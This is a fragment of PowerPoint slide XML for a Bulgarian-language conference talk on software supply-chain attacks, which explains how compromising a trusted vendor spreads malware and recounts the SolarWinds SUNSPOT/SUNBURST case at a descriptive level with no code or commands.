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pace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66" r:id="rId3"/>
    <p:sldId id="269" r:id="rId4"/>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="271" r:id="rId6"/>
    <p:sldId id="273" r:id="rId7"/>
    <p:sldId id="274" r:id="rId8"/>
    <p:sldId id="272" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="277" r:id="rId12"/>
    <p:sldId id="276" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="282" r:id="rId15"/>
    <p:sldId id="281" r:id="rId16"/>
    <p:sldId id="280" r:id="rId17"/>
    <p:sldId id="283" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="268" r:id="rId22"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Montserrat" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId24"/>
      <p:bold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0" roundtripDataSignature="AMtx7mjsmSKRAsy2XXUcq72eANwUjScR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174"/>
    <p:restoredTop sz="64034"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="76" d="100"/>
          <a:sy n="76" d="100"/>
        </p:scale>
        <p:origin x="34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customschemas.google.com/relationships/presentationmetadata" Target="metadata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70496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Казвам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Калоян</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Георгиев</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Principal Engineer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Paysafe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 err="1"/>
              <a:t>Днес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говорим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supply chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>атаки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>защо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>една</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>компрометирана</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>система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повали</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>хиляди</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>други</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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какво</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>конкретно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>можем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направим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>утре</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сутрин</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>Както и най-интересните случаи по темата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завършим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две</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" err="1"/>
              <a:t>демота</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;1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Един</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>въпрос</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>колко</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> developers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> според вас днес</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пуснаха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install?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="bg-BG" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US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колко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bg-BG" dirty="0" err="1"/>
              <a:t>тяхх</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>знаят</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> КОЙ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написал</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>всичките</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакета</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>които</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>са</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дръпна</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>ли</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Почти</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>никой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Точно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доверие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говорим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>днес</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> и как една </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" err="1"/>
              <a:t>компроментирана</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> система може да пробие хиляди</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="bg-BG" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;25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DDF669E4-D7B2-23A7-9803-D33E0A127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2138FEE7-77A3-FB14-BD6D-51720F417F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dirty="0" err="1"/>
              <a:t>Ключовата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>идея</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нападателят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атакува</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>целта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>директно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Той</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>компрометира</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нещо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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което</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>целта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ВЕЧЕ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вярва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доставчик</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>библиотека</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>система</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>механизъм</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Атакуваш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>веднъж</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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доставчикът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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>разпространява</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>зловредния</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>код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хиляди</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>клиенти</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>подписан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легитимен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Мащабът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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>което</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>прави</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>тези</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>атаки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>толкова</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>опасни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>Аз обожавам мащабни неща! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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69C48B26-B331-0EED-3FF7-01A2AC7F30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549715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42E7B93D-9926-3AB7-6F12-37E0EADCD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3DCC529D-B2D3-D827-4555-F2FDF083873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Представете</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>си</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дърво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компрометиран</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>възел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основата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доставчикът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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хиляди</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>засегнати</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>листа</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>надолу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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SolarWinds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компрометиран</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сървър</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доведе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~18 000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инсталирани</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> backdoor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>а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умножителят</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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прави</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> supply chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>атаките</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>толкова</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>атрактивни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нападателите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2D8349C6-8412-D061-A2AE-9298F76A05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61689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670C585C-076E-3544-9A51-389DF778F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C74F6EFF-B972-9EC6-28AD-5D527754BB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SolarWinds, 2020 — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>учебникарският</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>случай</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>приписван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руското</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>разузнаване</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SVR / APT29.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Нападателите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>проникват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BUILD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>средата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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работещ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сървър</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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във</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>фабриката</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>която</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>компилира</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>продукта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SUNSPOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>подменя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сорс</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>кода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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>време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компилация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>така</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>че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Git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>всичко</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>изглежда</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>чисто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Троянизираните</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>обновления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Orion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подписани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легитимния</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сертификат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SolarWinds.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Около</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 18 000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>клиента</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>инсталират</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> backdoor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SUNBURST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>през</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>най-обикновено</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, trust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>update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7695F98E-90BF-A5D6-2C50-311C949B9BE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19469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468D7AFB-D129-4B76-B52B-E9AEC17CE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C5C953FD-9A4E-DB1C-0C29-179EB676DC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И любимата ми част от историята</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="bg-BG" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="bg-BG" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Защо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>остана</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>невидим</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>толкова</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дълго</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?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Backdoor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>изчаква</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>около</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>седмици</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>преди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направи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>каквото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било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После</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>имитира</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>легитимния</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Orion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>трафик</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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комуникацията</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>минава</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>през</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DNS — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>към</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>avsvmcloud.com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От</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~18 000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>заразени</a:t>
            </a:r>
